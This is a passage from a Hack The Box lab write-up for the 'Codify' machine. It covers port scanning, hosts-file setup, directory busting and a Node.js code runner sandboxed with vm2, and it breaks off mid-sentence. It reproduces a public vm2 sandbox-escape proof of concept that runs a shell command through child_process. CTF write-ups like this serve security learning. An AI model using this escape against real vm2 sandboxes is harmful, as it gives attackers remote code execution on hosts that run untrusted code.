Machine from Hack The Box:
nmap scan →
Of the 1,000 most common ports, ports 22, 80, and 3000 are open. I haven’t ever seen 3000 as a listed port, so I’m going to disregard that for now and focus on 80.
22 → OpenSSH 8.9p1 Ubuntu
80 → Apache v2.4.52
<aside>
⚠️ Add the following line:
10.10.11.239 codify.htb
to /etc/hosts
</aside>
For Hack The Box machines, we might need to modify the /etc/hosts file and add a hostname entry for the target. Sometimes this is needed to access the web pages, so I do it for all Hack The Box machines.
The website is a Node.js code runner… I wonder if it does input sanitization correctly? You can use the editor to run some basic JavaScript.
Furthermore, going to /about, they use the vm2 library to sandbox JS. What version they use could be helpful, as there could be a vulnerability for it. They likely use v3.9.16.
Googling “vm2 vulnerabilities”, there seem to be a lot of sandbox escape or bypass and RCE proofs of concept. However, diving into some of the proof-of-concept guides, they use the child_process module, which is disallowed by the Codify software (check below).
```javascript
// Public vm2 sandbox-escape proof of concept (as found in the guides above);
// it depends on child_process, which Codify's module blacklist blocks.
const { VM } = require("vm2");
const vm = new VM();
const code = `
const err = new Error();
err.name = {
  toString: new Proxy(() => "", {
    apply(target, thiz, args) {
      const process = args.constructor.constructor("return process")();
      throw process.mainModule.require("child_process").execSync("echo hacked").toString();
    },
  }),
};
try {
  err.stack;
} catch (stdout) {
  stdout;
}
`;
console.log(vm.run(code)); // -> hacked
```
Also located on /limitations is the exclusion of certain Node.js modules for security purposes: a blacklist of modules that aren’t allowed to be executed, and a whitelist of the only modules that can be imported.
Here’s some Wappalyzer information as well to get a feel on the technologies behind the website’s backend:
Also, let’s perform some directory busting to get more information on the website’s paths.

```
dirb http://codify.htb
```

Only 4 URLs are found with common.txt; the server-status path is also forbidden.
After enumeration, my first thought is to try and perform some RCE using the module whitelist which contains the following JS modules: